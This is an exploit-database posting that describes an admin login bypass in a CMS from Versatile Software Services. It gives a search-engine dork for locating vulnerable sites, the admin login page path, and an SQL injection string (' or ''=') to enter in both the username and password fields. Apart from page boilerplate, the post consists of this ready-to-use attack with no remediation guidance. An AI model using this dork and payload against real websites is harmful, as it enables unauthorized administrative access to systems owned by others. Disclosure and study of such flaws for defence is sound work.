VSSPL CMS Admin Login Bypass

2018.03.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit title: Admin Login Bypass in " Versatile Software Services " CMS # # Dork: “ inurl:/alogin.aspx intext: Powered By :- Versatile Software Services ” # # Date: 3-23-2018 # # Exploit Author: Mehdi Razmjoo ( razmjumehdi@gmail.com ) # # Vendor Homepage: http://www.vsspl.co.in # # Category: Web Application # # Tested On: Safari - Firefox # # ============================= # # Description: # # First of all attacker find admin login page like: # " http://Server/alogin.aspx " # after that bypass admin Username & Password through this command: # # Admin ID: ' or ''=' # Password: ' or ''=' # # Then attacker " Login " in this page. #


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top